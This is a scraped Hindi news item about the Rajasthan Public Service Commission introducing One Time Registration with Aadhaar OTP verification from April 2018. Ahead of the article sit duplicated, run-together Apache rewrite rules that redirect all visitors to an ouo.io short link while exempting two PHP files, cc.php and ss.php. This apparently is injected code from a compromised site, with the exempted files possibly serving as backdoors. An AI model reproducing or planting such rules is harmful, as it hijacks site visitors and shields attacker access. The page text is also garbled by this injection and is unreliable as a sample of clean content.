
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 400
Previousअजमेर। राजस्थान लोक सेवा आयोग (आरपीएससी) अप्रैल-2018 से ओटीआर प्रक्रिया शुरू करने जा रहा है। ओटीआर योजना परीक्षाओं में पारदर्शिता आएगी, साथ ही अभ्यर्थियों के हित में व सुविधाजनक रहेगी। इसके तहत अभ्यर्थी का आयोग की ओर से ली जाने वाली भर्ती परीक्षाओं में वन टाइम रजिस्ट्रेशन (ओटीआर) हो जाएगा। इस योजना के शुरू होने के बाद अभ्यर्थियों को आयोग की भर्ती परीक्षाओं में बार-बार आवेदन के बजाय एक ही बार आवेदन करना होगा। आयोग ने इस संबंध में दिशा-निर्देश जारी किए।
अभ्यर्थी को संवीक्षा या प्रतियोगी परीक्षाओं में आवेदन के साथ आधार कार्ड नंबर भी अपलोड करना होगा। आधार का सत्यापन उसके आधार नंबर पर रजिस्टर्ड मोबाइल नंबर पर भेजे गये ओटीपी यानी वन टाइम पासवर्ड से होगा।